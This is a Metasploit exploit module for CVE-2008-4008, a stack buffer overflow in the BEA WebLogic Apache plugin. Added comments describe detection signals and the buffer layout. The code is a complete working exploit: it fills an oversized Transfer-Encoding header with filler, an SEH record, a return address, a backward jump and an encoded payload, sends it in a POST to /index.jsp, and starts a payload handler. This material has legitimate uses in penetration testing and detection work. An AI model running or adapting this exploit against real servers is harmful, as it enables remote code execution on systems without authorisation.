Path: blob/master/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2008-4008 (OSVDB 49283): a stack-based buffer
# overflow in the BEA WebLogic Apache plugin, reached through its error
# reporting for unknown Transfer-Encoding headers (see 'Description').
#
# Defender notes, derived only from what this module sends:
# - The trigger is a single POST to /index.jsp whose Transfer-Encoding header
#   value is 5800 bytes long with an empty body. A request header of that size
#   is anomalous and is a reasonable detection signal at a reverse proxy or WAF.
# - The technique is an SEH overwrite (Msf::Exploit::Remote::Seh,
#   generate_seh_record, EXITFUNC 'seh'). The mitigation to verify is the
#   vendor fix referenced by CVE-2008-4008.
class MetasploitModule < Msf::Exploit::Remote
  # Reliability rank as declared by the author.
  Rank = GreatRanking

  # HTTP fingerprint pattern the framework matches against the target banner.
  HttpFingerprint = { :pattern => [ /Apache/ ] }

  # HttpClient presumably supplies send_request_cgi and the VHOST datastore
  # option; Seh presumably supplies generate_seh_record (both used in exploit).
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::Seh

  # Declare module metadata. The caller's `info` hash is merged via
  # update_info and handed to the superclass.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'BEA Weblogic Transfer-Encoding Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow in the BEA
        Weblogic Apache plugin. This vulnerability exists in the
        error reporting for unknown Transfer-Encoding headers.
        You may have to run this twice due to timing issues with handlers.
      },
      'Author'         => 'pusscat',
      'References'     =>
        [
          [ 'CVE', '2008-4008' ],
          [ 'OSVDB', '49283' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
        },
      'Privileged'     => true,
      'Platform'       => 'win',
      # Payload constraints: at most 500 bytes, and 0x00/CR/LF are excluded,
      # which matters because the payload is delivered inside an HTTP header
      # value (see exploit below).
      'Payload'        =>
        {
          'Space'    => 500,
          'BadChars' => "\x00\x0d\x0a",
          'StackAdjustment' => -1500,
        },
      # Single target with a hard-coded return address; the author's comment
      # identifies it as a pop/pop/ret gadget.
      'Targets'        =>
        [
          [ 'Windows Apache 2.2 version Universal',
            {
              'Ret' => 0x1001f4d6, #pop/pop/ret
            }
          ],
        ],
      'DisclosureDate' => '2008-09-09',
      'DefaultTarget'  => 0))
  end

  # Build the request that triggers the overflow, send it, then hand off to
  # the payload handler.
  #
  # Buffer layout (5800 bytes of random alphanumeric filler):
  #   offset 0, length 7 + payload   : 7 NOP bytes followed by the encoded payload
  #   offset 5781, length 8          : SEH record built from target.ret
  #   offset 5789, length 5          : jump back toward the payload (author's comment)
  # Every offset is fixed for the single target declared above.
  def exploit

    sploit = rand_text_alphanumeric(5800)
    sploit[5781, 8] = generate_seh_record(target.ret)
    # Jump backward to the payload
    sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"
    sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded

    # NOTE(review): this unconditionally overwrites any user-supplied VHOST
    # option in the datastore rather than only defaulting it; kept as-is.
    datastore['VHOST'] = 'localhost'
    # The whole buffer travels as the Transfer-Encoding header value of a
    # POST with an empty body.
    send_request_cgi(
      {
        'method'  => 'POST',
        'url'     => '/index.jsp',
        'data'    => '',
        'headers' =>
          {
            'Transfer-Encoding' => sploit
          }
      })

    # Payload handler hand-off; the description notes a second run may be
    # needed because of handler timing.
    handler

  end
end